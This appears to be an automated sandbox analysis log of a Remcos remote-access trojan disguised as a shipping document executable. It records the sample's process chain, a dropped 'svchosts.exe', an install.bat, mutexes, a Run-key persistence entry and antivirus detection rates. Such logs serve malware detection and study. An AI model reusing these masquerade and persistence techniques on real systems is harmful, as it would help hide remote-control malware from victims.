          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_004081B7
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_00408150
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV OLYMPIC PROGRESS VSL PARTICULARS.exe.logJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMutant created: \Sessions\1\BaseNamedObjects\ZYbcPNZuhmAjcdlhlXvjXjwC
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeMutant created: \Sessions\1\BaseNamedObjects\remcos_lfqwkauxufogluh
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_01
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile created: C:\Users\user\AppData\Local\Temp\install.batJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeVirustotal: Detection: 71%
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeMetadefender: Detection: 34%
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile read: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe 'C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe'
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' 'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe' Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,17_2_00407D38
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 0_2_003524D8 push edx; iretd 0_2_003524E7
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 0_2_02630A3B push cs; retf 0_2_02630A3C
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 0_2_02631383 pushfd ; ret 0_2_02631385
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 0_2_02633CDA push esp; retf 0_2_02633CE1
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040FCF0 push eax; ret 17_2_0040FD1E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00F924D8 push edx; iretd 17_2_00F924E7
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 22_2_00C124D8 push edx; iretd 22_2_00C124E7
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 22_2_04FD1383 pushfd ; ret 22_2_04FD1385
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 22_2_04FD6E95 push FFFFFF8Bh; iretd 22_2_04FD6E97
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 22_2_04FD0A3B push cs; retf 22_2_04FD0A3C
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_007924D8 push edx; iretd 23_2_007924E7
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_01111383 pushfd ; ret 23_2_01111385
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_01110A3B push cs; retf 23_2_01110A3C
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 23_2_01113CDA push esp; retf 23_2_01113CE1
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_005F24D8 push edx; iretd 25_2_005F24E7
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_02951383 pushfd ; ret 25_2_02951385
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeCode function: 25_2_02950A3B push cs; retf 25_2_02950A3C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.76293714446
          Source: initial sampleStatic PE information: section name: .text entropy: 7.76293714446
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c17_2_0040A71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeFile created: C:\Users\user\AppData\Roaming\remcos\svchosts.exeJump to dropped file
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run remcosJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run remcosJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,17_2_00407D38
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
